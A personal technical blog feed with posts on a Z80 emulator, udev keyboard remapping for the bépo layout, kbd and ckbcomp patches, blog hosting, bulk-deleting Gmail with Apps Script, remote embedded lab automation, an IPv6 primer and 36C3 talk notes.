I did not finish the emulator, but I had a somewhat working Z80 CPU in the end, and learned a lot from it. So I decided to share what I learned, but this time not with the focus on my code (there are many such emulators, many are very good), but on this CPU architecture, the Z80, and some secrets that were discovered 30 years after its release.

I submitted a proposal to the FOSDEM Emulation devroom, and it was accepted. You can read the slides and watch my 2022 talk on Z80's last secrets here, and the discussion that ensued that is almost as long ! I had bad networking then (and mic settings), so I'm sorry about the quality of the Q&A.

My talk did not go into all the details of the Z80. For example, I had missed the gate-level reverse engineered simulators z80explorer and visualz80remix, and that should help with MEMPTR and other implementation details. I also discovered after the talk, a discord in which emulator developers are discussing even more recently-discovered secrets. But adding content to the talk would have made it even more specialized and complex. Maybe for a future talk ?

In the Q&A, I was asked if I preferred Go (since I gave a talk on a Go project 3 years earlier), or Rust (in which gears is written). I have been learning Rust for some time, and I still don't know how to answer this question. Go is definitely a simpler language, even though it has some surprising quirks. Rust is more complex but what you learn upfront reduces surprises later. Both can be very useful, and even have some overlap in functionality; I'll defer to John Arundel's Rust vs Go for more details. (fun story: I started learning Go 9 years ago, and am now writing some professionally; maybe in 5 years I'll write Rust for money ? Although I suspect it might come earlier…)

Emulator progress

This 2022 summer I started working again on the emulator, wanting to tackle at least the display side (VDP) of the Game Gear. But in the process I discovered that I had forgotten to wire the interrupt emulation properly (not needed for the test suites with no devices). I also took some time to properly implement memory banking for Sega cartridges, unused in the ZX Spectrum tests. I still found and fixed CPU bugs in my "complete" Z80 CPU emulator. There are other CPU issues which I'm not sure how to fix yet, but that shouldn't be an issue for basic emulation.

I initially dumped the VDP display state into an image to debug if I understood correctly the way the background and sprites were drawn. Here are three images of the splash screen for Sonic The Hedgehog, as I fix bugs in the implementation:

First render of the Sega splash screen with buggy code.	Render of the Sonic Press Start screen with same buggy code.
Render of the Sega splash screen after some bugfixes	Render of the Press Start screen after the same bugfixes.
Fixed Sega splash screen render with proper sprite offsets.	Fixed Press Start screen render with proper sprite offsets.

Note that this is the full VDP buffer, the LCD display area is smaller in the center; this is part of the things that aren't implemented yet !

I wired this "debug" view into a window that shows a pixel buffer, and right now it seems to work properly since my display is at 60fps. There are still many things to do but it's very encouraging that it's showing something !

Keyboard layout adventures

2021-04-24T00:00:00+02:00

I've been using a french dvorak-like key layout, called bépo for about 13 years; sometimes, I need to hack things around to have it work everywhere, like when I wrote support for it android physical keyboards.

GPD Win Max Adaptation

I acquired recently a GPD Win Max, which is a descendant from netbooks crossed with a portable game console, and it quickly became my main computer (my old laptop was 10 years old, so it was indeed an upgrade).

While it's a very capable little device, it has a very condensed keyboard, which does not make it easy to use, especially when typing in bépo:

As you can see, it has been custom-designed for qwerty, and does not take into account other keyboard layouts. For example, there's no AltGr, and semicolon is hidden next to space. 60% keyboard owners would be right at home, if it were not for the lack of programmability of the layers.

In bépo, semicolon maps to N, which is a relatively common key. I decided to remap it like this, with bépo in mind:

I replaced Enter with semicolon (N in bépo), and put Enter next to Space, taking inspiration from the split keyboards which better utilize thumbs for typing. I moved Alt on the Windows key, which I almost never use, and put AltGr on the semicolon key. Finally, I depend much more on Tab than Caps Lock, so I swapped the two keys.

To do this in Linux, once upon a time, one had to modify the xmodmap key, or create a custom xkb layout. Both of these would be less useful today: one still needs to type a passphrase before the X server starts (to unlock the disks), or to type stuff in wayland apps (which don't use X layout). Fortunately, starting udev 175, it's now possible to rearrange physical keys directly with udev. See for example this tutorial or this one in french (english here).

So I decided to re-order the keys (scancodes) at the udev level, to make use of the bépo layout as-is. The first step it to find which input device is the keyboard. I like looking into /proc/bus/input/devices. On x86 laptops, the keyboard is usually accessible through the i8042 device:

> cat /proc/bus/input/devices
[… cut …]

I: Bus=0011 Vendor=0001 Product=0001 Version=ab83
N: Name="AT Translated Set 2 keyboard"
P: Phys=isa0060/serio0/input0
S: Sysfs=/devices/platform/i8042/serio0/input/input4
U: Uniq=
H: Handlers=sysrq kbd leds event4
B: PROP=0
B: EV=120013
B: KEY=402000000 3803078f800d001 deffffdfffefffff fffffffffffffffe
B: MSC=10
B: LED=7

[… cut …]

It says here its sysfs device is /devices/platform/i8042/serio0/input/input4. I want to know how to match this device with udev, so I run:

> sudo udevadm info /sys/devices/platform/i8042/serio0/input/input4
P: /devices/platform/i8042/serio0/input/input4
L: 0
E: DEVPATH=/devices/platform/i8042/serio0/input/input4
E: PRODUCT=11/1/1/ab83
E: NAME="AT Translated Set 2 keyboard"
E: PHYS="isa0060/serio0/input0"
E: PROP=0
E: EV=120013
E: KEY=402000000 3803078f800d001 deffffdfffefffff fffffffffffffffe
E: MSC=10
E: LED=7
E: MODALIAS=input:b0011v0001p0001eAB83-e0,1,4,11,14,k71,72,73,74,75,76,77,79,7A,7B,7C,7E,7F,80,8C,8E,8F,9B,9C,9D,9E,9F,A3,A4,A5,A6,AC,AD,B7,B8,B9,D9,E2,ram4,l0,1,2,sfw
E: SUBSYSTEM=input
E: USEC_INITIALIZED=12327754
E: ID_INPUT=1
E: ID_INPUT_KEY=1
E: ID_INPUT_KEYBOARD=1
E: ID_BUS=i8042
E: ID_SERIAL=noserial
E: ID_PATH=platform-i8042-serio-0
E: ID_PATH_TAG=platform-i8042-serio-0
E: ID_FOR_SEAT=input-platform-i8042-serio-0
E: TAGS=:seat:

The interesting line here is the MODALIAS. I'll use the input:b0011v0001p0001eAB83… line to match precisely this keyboard, and ask udev to swap its keys. In order to do this, I follow the tutorial I linked earlier and create a file in /etc/udev/hwdb.d:

> cat /etc/udev/hwdb.d/98-gpd-keyboard.hwdb
evdev:input:b0011v0001p0001eAB83*
 KEYBOARD_KEY_db=leftalt   # Alt on windows
 KEYBOARD_KEY_38=enter     # enter on Alt
 KEYBOARD_KEY_1c=semicolon # n on enter
 KEYBOARD_KEY_27=rightalt  # AltGr on n
 KEYBOARD_KEY_3a=tab       # swap caps lock and tab
 KEYBOARD_KEY_0f=capslock  # swap tab and caps lock

Then update the udev hwdb:

> sudo udevadm hwdb --update

and re-trigger rules for this device:

> sudo udevadm trigger /dev/input/event4

Note that I use the device node instead of the sysfs path for the trigger: /dev/input/event4.

Yubikey OTP with bépo

A Yubikey used in OTP mode will send keys that have been selected to be a common "subset" between common western layouts: qwerty, azerty, qwertz, etc. Of course, no key is at the same place in bépo, so this this doesn't work.

Using the exact same methodology as before, it's possible to use a Yubikey (in OTP mode) without changing the keymap to qwerty/azerty before use. Here is the file I now have on multiple machines:

> cat /etc/udev/hwdb.d/99-yubi-bepo.hwdb
# Scancodes: https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2
# Yubikey character list: https://blog.inf.ed.ac.uk/project313/2016/01/29/modified-hexadecimal-encoding-a-k-a-modhex/
# keycodes: /usr/include/linux/input-event-codes.h
# tutorial: EN https://yulistic.gitlab.io/2017/12/linux-keymapping-with-udev-hwdb/ FR https://www.vinc17.net/unix/xkb.fr.html
evdev:input:b0003v1050p0407e0110*
 KEYBOARD_KEY_70005=q          # c
 KEYBOARD_KEY_70006=h          # b
 KEYBOARD_KEY_70007=i          # d
 KEYBOARD_KEY_70008=f          # e
 KEYBOARD_KEY_70009=slash      # f
 KEYBOARD_KEY_7000a=comma      # g
 KEYBOARD_KEY_7000b=dot        # h
 KEYBOARD_KEY_7000c=d          # i
 KEYBOARD_KEY_7000d=p          # j
 KEYBOARD_KEY_7000e=b          # k
 KEYBOARD_KEY_7000f=o          # l
 KEYBOARD_KEY_70011=semicolon  # n
 KEYBOARD_KEY_70015=l          # r
 KEYBOARD_KEY_70017=j          # t
 KEYBOARD_KEY_70018=s          # u
 KEYBOARD_KEY_70019=u          # v

Fun fact: it wouldn't be needed if we had a way to always use a given keymap (say, qwerty) for a device that sends keys like this. And there is such a way, kinda: the systemd developers added such a feature in hwdb 5 years ago, but it still isn't honored by desktop environments.

Inability to type with bépo AFNOR in a Linux console

In 2015, a french standardization process was started to make new and homogeneous french keyboard layouts. In 2019, a new AZERTY layout was standardized. In addition to this, years of community efforts (of which I had nothing to do with, but I saw the countless mailing list messages) helped standardize at the same time a new BÉPO layout, bépo 1.1, or bépo AFNOR.

It's almost the same as bépo 1.0, so moving to it was pretty painless. It was also integrated relatively quickly in Linux distributions via the xkeyboard-config project (although it does not have all the compose goodies, which are mostly for exotic characters).

While it was painless to use in desktop environments, this layout did not load during boot in console mode, which plymouth uses for querying the disk passphrase. Since it did not load, the fallback was to an unconfigured qwerty layout, which is not the most comfortable to type passphrase if you're not used to it. It was reported to Debian, but the issue is identical in Fedora or Ubuntu. After being annoyed for a few months, I took some time to try to fix it.

Virtual TTY keyboard layouts are first converted by ckbcomp from the xkb format, and then loaded into the kernel by kbd. So I had a look at kbd, and after messing around, I sent the following patch upstream:

Subject: [PATCH] src/libkeymap: add support for parsing more unicode values

The auto-generated (with ckbcomp) file fr-bepo_afnor did not load (even
partially), because of an U+1f12f (copyleft symbol) that is wrongly
parsed, generating this error message:

    too many (160) entries on one line

Fix libkeymap so that the keymap can be parsed, even if the offending
character won't be loaded because of the ushort limitation of the
kb_value KDSKBENT uapi.

It's better to have the keymap partially loaded than not at all.
[… cut …]
diff --git a/src/libkeymap/analyze.l b/src/libkeymap/analyze.l
 Hex            0[xX][0-9a-fA-F]+
-Unicode            U\+([0-9a-fA-F]){4}
+Unicode            U\+([0-9a-fA-F]){4,6}
 Literal            [a-zA-Z][a-zA-Z_0-9]*
[… cut …]

-               if (yylval->num >= 0xf000) {
+               if (yylval->num >= 0x10ffff) {
                    ERR(yyextra, _("unicode keysym out of range: %s"),

As you can see, a single symbol '🄯' couldn't be loaded because its unicode value is 5 hex characters instead of 4, and is bigger than the max of 0xf000. So I made the lexer regex recognize longer unicode characters (up to 6, the max allowed), and made the range go to the current unicode limit as well.

Only there is one issue: it was simply incorrect. While it worked on my machine, it was just the wrong thing to do, as you can see with this answer from Alexey Gladkov, kbd's maintainer:

Nop. Partially keymap loading is very dangerous. You can get a completely unusable console. The libkeymap shouldn't break the console if it is known in advance that the keymap is not correct. You should fix ckbcomp so that it generates the correct keymap.

This is because the linux kernel simply does not support loading unicode symbols greater than 0xf000 with the KDSETKEYCODE ioctl, because the ABI uses 16-bits values. There are probably other reasons internal to the kernel console keyboard or font handling, but I haven't dug into why.

So I changed my patch to kbd show a better error message instead

Subject: [PATCH] src/libkeymap: better error message on unsupported unicode
 value

The auto-generated (with ckbcomp) file fr-bepo_afnor did not load (even
partially), because of an U+1f12f (copyleft symbol) that is wrongly
parsed, generating this error message:
    too many (160) entries on one line

Fix libkeymap so that the symbol can be parsed, and later generate a
better error message:
    unicode keysym out of range: U+1f12f

At least users will know what is wrong with their keymap.
[… cut …]
diff --git a/src/libkeymap/analyze.l b/src/libkeymap/analyze.l
 Hex            0[xX][0-9a-fA-F]+
-Unicode            U\+([0-9a-fA-F]){4}
+Unicode            U\+([0-9a-fA-F]){4,6}
 Literal            [a-zA-Z][a-zA-Z_0-9]*
[… cut …]

And then started looking at ckbcomp a huge perl script, part of the console-setup project, that is used to do the conversion from xkb format, to a format understandable by kbd.

It already had provisions for removing unknown symbols with the internal $voidsymbol, which I used to replace any character outside of the range supported by Linux.

Here is the patch I sent upstream:

Subject: [PATCH] ckbcomp: fix fr-bepo_afnor conversion by skipping unsupported symbols

Some X keymaps, including fr bepo_afnor use unicode symbols greater than
0xf000; for example the copy left symbol U+1f12f.

These values aren't supported by the linux kernel, so loadkeys won't be
able to load them, or even parse the value.

Skip those symbols to generate valid keymaps.

Fixes: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968195
Signed-off-by: Anisse Astier <anisse@astier.eu>
---
 Keyboard/ckbcomp | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/Keyboard/ckbcomp b/Keyboard/ckbcomp
index e638a24..c3003e6 100755
--- a/Keyboard/ckbcomp
+++ b/Keyboard/ckbcomp
@@ -3815,6 +3815,9 @@ sub uni_to_legacy {
        return $voidsymbol;
    }
     } else {
+        if ($uni >= 0xf000) { # Linux limitation
+            return $voidsymbol;
+        }
    return 'U+'. sprintf ("%04x", $uni);
     }
 }

~~Unfortunately, I've yet to hear from the console-setup maintainers on whether this is correct or not. I'll update this article if the situation changes.~~ In the meantime, I was able to scratch my itch, and I can now type my disk unlock passphrase in plymouth with the bépo 1.1 key layout.

Update: the bug has been fixed on Oct 31st in console-setup 1.206! It made it to Fedora 36, but not Ubuntu 22.04 :-(

Blog update

2020-11-14T00:00:00+01:00

I recently updated the server where this blog is hosted, so I tought I'd do an update on the original post explaining the tech stack used to run it. Once in seven years shouldn't be too meta.

The design

First of all, kudos to Pascal Navière, a very talented polymath that did the design of this site(CSS, DOM structure, etc.), which I then modified. All bugs are therefore my own additions.

Since launch, Pascal has found a career in software engineering. He has so many tricks up his sleeve, you would be surprised. But it's not my place to tell his story.

What I failed to mention initially, was all the icons done in CSS art, which was pretty rare at the time, and secret superpower of Pascal's. The icons are on the left (or bottom for lower resolutions), and in the share bar at the bottom of every article; some of which might be blocked by uBlock lists, and I decided to not work around it. Despite being very careful not load any external resource (other than the font(update 2021-02-07: I got rid of the third-party font request, it's now useless anyway)), it's not my place to decide if someone thinks the share bar is an annoyance or not.

There's no use for the Google+ icon anymore, so it has been retired. But if you look into the CSS, you can find it with the others.

At the beginning there also wasn't any pagination: I did not deem it necessary with only one article, despite it being in Pascal's original design. I added it later to the templates.

The tech

The DNS you used to access this website is still hosted by gandi. The website itself resides on a Scaleway Stardust instance, more than sufficient for my needs, and currently the cheapest virtual private server in the world. The SSL certificate has been provided by Lets's Encrypt for many years now.

On this VPS, Ubuntu 20.04 LTS, with nginx serving the actual pages.

Pages which are all old school static HTML, generated by the venerable Pelican currently at version 4.5.0. I've thought multiple times about moving to another engine like Hugo or Zola, but none has all the features I need (like Pelican webassets which compiles the CSS into a bundle), and I'm too lazy to port the templates anyway.

On my machine pelican is run with python 3.8.6, in a venv where pip was installed. The content is edited with vim on Fedora 32.

Over the years, I did some experiments, like compiling nginx with the Pagespeed plugin, but I've moved back to distro builds since maintaining it wasn't worth the hassle. The website is still served over HTTP/2, and supports IPv6.

Many years ago, I moved to Let's Encrypt instead of StartSSL. The later isn't trusted anymore by browsers after some woes. I initially settled for simp_le as an ACME client, and deployed it with ansible using L-P's role. It has served me well over the last (almost four) years, but isn't maintained anymore, and simp_le doesn't support the latest version of the protocol, ACMEv2.

As I moved to a new server, I wanted all software to be automatically deployed with ansible.

I had a look at acmetool. Since there's no official acmetool build with the latest version; I did not want to install go on the server, however trivial it might seem, and handle the updating myself. Ditto for trusting a third-party repo. The acmetool version in the distro repos does not support ACMEv2, so I wouldn't be able to get a new certificate, and renewal would stop working in 2021. Therefore I chose to use certbot the original ACME client.

I initially wanted to use a third party ansible role to simplify deployment, so I then settled on both nginx and certbot roles from Jeff Geerling. I successfully used those to deploy a test site, but was unsatisfied with how complex it was. I had to patch the vendored nginx role to add IPv6 support, and it deployed the redirects using separate files. It all seemed to complex for only one website; a task that could be done with a single ansible template and an apt rule. In addition, the certbot role did not support the nginx plugin, so I rewrote it all, and removed the vendored roles.

The recommended way to install certbot on all Linux distros is to use snapd; and while I understand why they chose this approach (software is always up-to-date, and they control the deployment), snapd is a resource-hog which I had already disabled. So I decided to install certbot and certbot-nginx via pip, and keep them up-to-date automatically with a cron job. That makes a compromised PyPI a point of failure of this server, but I already trust them anyway.

In the end, nginx 1.18.0 (from Ubuntu) and certbot 1.9.0 (from PyPI) are both deployed with ansible 2.10.3, with python 3.8.5 (also from Ubuntu) on the server.

Mass delete of Gmail emails

2020-08-27T23:00:00+02:00

Gmail used to be the reference for "infinite email storage". Not anymore. The space growth stopped, and then Google started selling storage space.

It wouldn't be an issue if it were easy to mass delete emails; unfortunately batch delete operations can be quite long, and even lock you out of you inbox; using the UI, it might even regularly fail. I subscribe to many mailing lists, so I had hundreds of thousands of old emails to delete, I went looking for a new solution.

For this I used Google Apps Script to run js code on Google's servers to do this delete operation. The goal is to delete the result of search, or a label.

Here is the code to copy/paste in an Apps Script project:

function deleteOldEmail() {
  var batchSize = 100;
  var threads = [0, ];
  while (threads.length > 0) {
    threads = GmailApp.search('label:Lists-linux-kernel OR label:Lists-stable -{to:me OR from:me} before:2020/8/1');
    for (j = 0; j < threads.length; j+=batchSize) {
      GmailApp.moveThreadsToTrash(threads.slice(j, j+batchSize));
    }
  }
}

(based on this gist or this answer). You'll need to grant it access to gmail.

Here the emails from the search are moved to trash in batch of 100. Moved to thrash because direct deletion of email threads cannot be batched in the same way. Emptying trash is slightly faster than deleting those emails, and once enough space is freed, you can wait for the 30 days deadline to empty the trash automatically.

You can then schedule this deleteOldEmail function regularly by adding a time-based trigger: it will timeout a few times at first if you have a lot of emails, so you want it to be run again to complete the operation.

There are few limits to know about:

here the batch size corresponds to the maximum size of a moveThreadsToTrash operation
when scheduling it, you don't want to go over the daily limits. I've found that once every 4 hours is enough to be just below the limit (3 hours per day, with 30 minutes per run until timeout).

Depending on how many emails you have, it will complete after a few days. That's it!

The ability to work remotely in Embedded is a sign of software engineering maturity

2020-05-21T00:00:00+02:00

This has been brewing for a while, but I finally put it into words during this pandemic: if you're an embedded software engineer, the ability to work remotely (without the hardware next to you) is in fact a sign that you have reached a certain level of software engineering maturity.

Automation

Being able to automate your setup, opens the door to many things: first, automation frees the mind of the menial tasks. I've worked on projects where we had dedicated reset button on the board. Very fast to reboot, especially when you're writing bootloaders or debugging crashing kernel drivers. And very practical. But I couldn't be more wrong.

What's needed is to control the power supply. A reset button is just a bonus, but you need to be able to control the power supply. And if the device does not power on automatically, you need a way to control that, too. On all the recent projects I worked on (STB and GW), the board would turn on automatically on electrical power on. This means you can go cheap and order off-the-shelf USB-controlled power switches; otherwise, it's always possible to build more complex setups, but I like that this uses a standard power supply, up to the wall socket.

I'm assuming you always have a serial port plugged to your hardware; if not you might need one, or a similar facility.

Automation means you can track a hard to reproduce bug that only happens after an electrical reboot. It means you can try to reproduce those hangs easily. It means you can work around bugs that only happen in developer mode when the workaround is easy to automate and much cheaper than the fix.

And it means that in case of a pandemic you can continue working from home, with your hardware in a remote lab or at the office, as if (almost) nothing changed.

sispmctl

The energenie power switch is controlled with the readily-available sispmctl package in most distros. To be able to use it as user from the dialout group, I use the following udev rule:

SUBSYSTEM=="usb", ATTR{idVendor}=="04b4", ATTR{idProduct}=="fd13", GROUP="dialout", MODE="660"

You can substitute the appropriate vendor and product ids.

I use a simple script to power-cycle port 1 by default, or the port passed in argument:

#!/bin/bash
PORT=${1:-1}
#off
sispmctl -q -f "$PORT"
sleep 2
#on
sispmctl -q -o "$PORT"

For maximum efficiency and saving a few keystrokes I usually have a keyboard shortcut to reboot the port I'm currently working on, mimicking a reset button, but without moving from your keyboard.

ser2net: serial port automation

Why do specific automation of the serial port, isn't reading from a tty trivial ? Well, almost. ser2net's initial goal was to make a serial port available over the network, meaning you can remotely connect to a board that is plugged to a different lab computer, without the need for local access on said computer. But this isn't the killer feature of ser2net. Since version 3.2 (now packaged in all distros), ser2net allows multiple clients to connect to a single device.

This means you can have a program that does trivial socket read/write (in telnet mode) to automate a task, and at the same time use the device from your terminal.

Here is how I configure it in /etc/ser2net.conf:

localhost,2000:telnet:0:/dev/blueserial:115200 8DATABITS NONE 1STOPBIT banner max-connections=5

Here I can use the "blue serial port" — I always give my serial ports a name: it usually refers to the color of the cable or the board I'm using — and it will listen in "telnet mode" on port 2000 on localhost only. It can support at most 5 connections in this configuration. You can then connect to it with telnet localhost 2000.

As a parenthesis, here is the udev rule to give the serial port a name:

SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="FTA6371G", SYMLINK+="blueserial"

I often have multiple serial adapters with the same usb ids, hence the use of the serial number to differentiate them.

Testing

Improving the everyday quality of life is only half the story. Now that you have superpowers, you can use those to enable another superpower: do automated testing.

You might have a testsuite that needs to power-cycle the board ? Very simple to do. You need to check the output of the serial port ? Very simple to automate with a socket.

Continuous Integration

And once you plug this to your continuous build infrastructure, you can start running your integration tests directly on hardware using the latest version of your software. I won't explain how CI works, but it's probably something you want to have.

LAVA can be useful if you want to build a virtual lab, as part of the chain that manages your board farm, and inside your CI loop; it can integrate with ser2net and your power switch, take your Jenkins artifacts and load them on boards to run your testsuites. You can find many articles and talks on why and how to use LAVA, but I recommend Bootlin's articles as starting point. You can even combine it with lavabo to add board reservation for lab shared with a team.

Not everything can, or should be done remotely (yet)

Working on embedded means you're always close to the hardware. There are things that just can't be automated without paying a very high cost/benefit ratio. But that ratio is much higher than most people think. For example, if you want to go into mass production and care about your yield, you might need to setup a testing bench for a sample (or even all) of your output. Any automation that you do upfront can be reused in the factory, since it's something that will need to be done anyway. And any setup giving you a view of a production board (test points, measurements, etc.) can be reused for a remote setup.

Sure, you won't be doing a board bringup with the hardware in remote lab. Nor would you be doing certain types of hardware enablement. But that does not mean that you shouldn't at least try to get the low hanging fruit.

And if you want higher software quality, and higher development velocity, investing in tooling can help you get there.

A beginner hacker's guide to IPv6

2020-02-02T20:22:02+01:00

I noticed recently how little I knew about IPv6. For someone working on broadband gateways, that's not something I'm most proud of. But I've learned a little in the past few months, and I thought I'd share it here.

How to read an IPv6 address: the zeroes are hidden

An IPv6 address is 128 bits wide, and written in eight groups of 4 hex-digits, separated by colons, like this:

2001:41d0:0001:c38f:0000:0000:0000:0001

Leading zeroes are ignored, so the previous address can be written like this:

2001:41d0:1:c38f:0:0:0:1

And a sequence of one ore more groups that are all zeroes can be replaced with ::, so the previous address is canonically written like this:

2001:41d0:1:c38f::1

This is the address of this blog at the time of this writing.

Put the address inside square brackets for URLs

To reduce the confusion with the IP:PORT notation, the IPv6 in URLs is enclosed in square brackets for URLs:

curl -v http://[2001:41d0:1:c38f::1]

curl -v https://[2001:41d0:1:c38f::1]:443

But not all tools would need that:

ping 2001:41d0:1:c38f::1

ssh 2001:41d0:1:c38f::1

Types of IPv6 addresses

There are three types of addresses to know about:

the loopback address ::1; that's your localhost or 127.0.0.1 in IPv4 (or the whole 127.0.0.0/8 subnet)
link-local addresses in the fe80::/10 range : their scope is local, and they shouldn't be routed/forwarded. Equivalent to 169.254.0.0/16 in IPv4.
global addresses; those are globally routed addresses; they're any other address.

Other interesting address types not covered here:

multicast addresses ff00::/8
unique local addresses (previously named site-local) fc00::/7 (can start with fd00:); they are used to build a private network.
the unspecified address :: (all zeroes) used for broadcast.

Client IPv6 addresses are autoconfigured by default

In IPv6, client hosts don't use DHCP by default (except in a few cases). They use autoconfiguration, which means the host decided of its address by itself, inside a pool of available addresses: this is Stateless Address Auto Configuration (SLAAC). Instead of asking your router to give you an address, in SLAAC, the client machine sends a Router Solicitation, which responds with a Router Advertisement that contains the range in which the client can configure an address; then chooses an address at random (or based on its MAC address), and runs a collision detection algorithm (Duplicate Address Detection) to prevent having the same address as a peer.

For link-local addresses, there does not even need to be router advertisements, since the range is known by default, a host can pick an address and then run it's duplicate detection algorithm.

DHCPv6 has lost and shouldn't be used

There exist a spec to attribute addresses via a DHCP mechanism: DHCPv6. But it isn't supported in Android, by choice. Admins that want to match IPv6 addresses to MAC addresses (say, for compliance purpose) should watch ICMPv6 SLAAC advertisements instead. But in a world of random MAC addresses by default on consumer devices, it doesn't really make sense. It's better to enforce a zero-trust network with a higher level authentication and a VPN.

Use AAAA DNS records

You store IPv6 addresses in an AAAA record instead of an A record:

$ dig anisse.astier.eu AAAA +short
2001:41d0:1:c38f::1

Your ISP gives you more IPv6 addresses than you could ever use

Your ISP probably gives you a /56 or /48 (mine gives a /61): it means that you have 2³⁵ to 2⁴⁸ more addresses than available in the whole IPv4 range (ignoring reserved ranges). I could address 2⁶⁷ devices in my network; that's 147,573,952,589,676,412,928 IPs.

Some cloud providers might give you single IPv6 address (/128). I think this is wrong and short-sighted; mostly used for market segmentation (the simplicity of configuration does not hold up a cursory look).

All your devices are globally reachable

That's the thing that surprises most people used to an IPv4 NAT-ed world mindset. Since your ISP gives you so many addresses, all your local devices can have a globally routed address. And it's a good thing, mostly. What this implies:

you can access your dev web server from anywhere in the world if you listen on global addresses instead of local or loopback one.
you can send your DNS requests to your home pi-hole wherever you are. Ditto for any service hosted on a random machine in your network.
you can directly connect to a peer for video chat, exchange data, etc. No need for UPnP, UDP hole punching, STUN gateways, and many other types of NAT-traversal technologies.

Security implications: you should make sure privacy extensions are enabled

Unfortunately, by default many OSes used their MAC address to choose a global address with SLAAC. This means that whole-plage scanning with masscan-like tools are possible on given OUIs. It takes about 5 minutes to scan the whole IPv4 range nowadays. That's what companies like Shodan or CybelAngel do continously.

The scan6 tool of the SI6 IPv6 toolkit (covered by Stéphane Bortzmeyer in french) can be used to do this type of scanning on IPv6.

This has the following implications for IPv6:

if badly-configured software starts some VMs with open services and a static network MAC address, you could instantaneously scan a given IPv6 prefix (provided you know its size) to for the presence of such a VM; because the last bits of the IPv6 would always be same same.
If you know a particular (say, IoT) device has open services and is vulnerable; you could scan its OUI for a given IPv6 prefix. That's still 2²⁴ IPs to scan; much less if you know the MAC sequencing pattern. This could be used for targeted attacks, or botnet/worms.
If a device connects to a malicious site, it can be scanned; for example that dev web server on your laptop; and the type of devices leaks because the OUI is in the IPv6. This breaks expectation of IPv4 NAT-ed world where you need to manually forward port for them to be publicly available

Luckily, all of this was understood a long time ago, and there are privacy extensions in IPv6: a way to randomize your SLAAC address, just like we now randomize Wifi MACs on untrusted networks. It is now implemented in most modern OSes. Unfortunately older ones, and some Linux distributions don't enable privacy extensions by default. In Linux, those are represented as temporary instead of global in ip -6 addr. Those temporary addresses are used when connecting to a service over IPv6, so that your MAC doesn't leak. The address should change regularly.

As far as I understand, privacy extensions address the issue of data leakage, but not the fact that you can then be scanned for mis-configured software (which to be fair is already the case in a NAT-ed IPv4 + websocket world). That's because the initial expectation was to have every device with its own firewall; and consider that it's up to the device to properly handle what's exposed to the world.

Therefore, a small issue I see, is that it's hard to have a server application to listen only on global IPs. It should enumerate the interfaces and IPs, and only listen on those that have "scope global" but not "temporary" or "secondary" addresses.

Random Trivia

It has been mandatory to support IPv6 on new devices in Brazil for three years.
It will soon be mandatory in France for 5G carriers.
When using link-local addresses, you should do scoping; which is add a % after the address to specify through which interface your connection should go through. But wget does not support link-local scoping; use curl instead. To connect to a link-local IP on port 8080 : curl -v http://[fe80::6e60:6ddd:d354:2234%wlp2s0]:8080
It's 2020 and Fedora still puts ip and ifconfig in /sbin ; without adding it to non-root users' PATH. I don't know why.
At FOSDEM, the default network is IPv6 only, and it works really well. But from time to time you might discover that something is not working. It's because it's not connecting over IPv6 (like the Steam client for instance).

There are many RFCs on IPv6; I couldn't cover here anywhere near everything that a professional network engineer should know. I hope I've covered the basics so that you can search for the rest yourself.

Thanks to Stéphane Bortzmeyer and Neil Armstrong for feedback on this article.

36th Chaos Communication Congress

2019-12-28T13:00:00+01:00

I’m at CCC for the first time this year ! Here my notes for a few of the talks.

Tamago

In an ideal world, one could pick the programming language of their choice and always generate the optimal machine code. But we live in the real world, and it isn't yet possible. Running code in a constrained environment, like baremetal SoCs means that your choice of languages is reduced, and towards low-level languages like C, which come with their own issues. The motivation for Tamago is to be able to run a higher-level language like Go on baremetal.

The goal of the Tamago project is to run Go on baremetal ARMv7, for example to be able to write security-sensitive bootloaders (firmware) on an NXP i.MX6ULL based usbarmory.

This isn't really a new idea, as Unikernels or library OSes often match the same description. But unikernels didn't match the requirements of depending on no C code (not importing another OS or library), or running on small embedded systems, not the cloud.

Go was chosen here because it's relatively easier to learn than other proven-on-embedded languages like Rust. Currently, Tamago is a patched Go compiler that adds another OS support GOOS=tamago, to be able to run GOARCH=arm on baremetal. The scope is different from TinyGo, that targets micro-controllers instead, and uses a completely different compiler implementation, as well as not supporting the full runtime and Go language yet. It's also different from the recently announced Embedded Go that targets Thumb and bigger microcontrollers.

The goal of Tamago is to be upstream-able in Go. The current patchset is about 3000 lines of code. That's about ~300 lines of glue code, ~2700 lines of re-used code, like the plan9 memory allocator or locking from js,wasm. Then there's ~600 lines of new code to provide ARMv7 and heap init functions.

There are few functions that should be provided in a board-support package: how to get random data, init hw, print a byte on the console, what is the ram size and offset, and how to get high-res time.

Writing drivers in go can be done easily either using Go's assembly support or using unsafe; it also means that the sensitive parts are identified and can be written with care and audited if needed. In the runtime, the only syscall that is implemented is write(), and it is used for debugging on the serial port.

In order to write a baremetal Go program, one should import the board package library to get its side-effects.

The Tamago authors wrote i.MX6 drivers to test their model: for the DCP co-processor, the HW random generator, a USB driver and a USB networking card (CDC-ACM).

Boot2root: Auditing bootloaders by example

Bootloaders are a critical part of any secure boot chain. The authors of this talk had a look at common open source bootloaders to look for any issue they could fine.

They looked at u-boot, a very commonly used bootloader in embedded systems, Coreboot is targeted at modern OSes and used in Chromebooks, Grub used in most Linux distros, Broadcom CFE, iPXE for network boot, Tianocore etc.

In most opensource bootloaders, there is no privilege separation: all codes runs with maximum privileges. The attack surfaces are NVRAM, files and file systems, busses (I2C/SPI…), etc.

For NVRAM, where environment variables are stored, one should look at where the variables are read, and if there's any kind of sanitization. For u-boot, many places were found where env_get() is called without any sort of size check of the data read. The attack scenario is a device for which NVRAM is modifiable (through hardware or host OS); this is then open for exploitation, for which a demo was shown with u-boot.

For the filesystems attack surface, often the images are read on a filesystem that is not signed or integrity checked. An example was given with grub's ext2 symlink handling.

When looking at TCP/IP, many issues can be found: TLV parsing is tricky for example. DNS can be poisoned, DHCP leases can be stolen. In u-boot, the DNS TID is hardcoded to 1, enabling easy mitm. In broadcom CFE, many memory corruptions were found in DHCP, ICMP handling, IP header length etc.

In iPXE for 802.11, a memory corruption bug was found SSID handling. Bluetooth was attacked, and issues were found in proprietary bootloaders. The most interesting attack vectors were in large frame handling and fragmentation, but no example was shown because of NDAs.

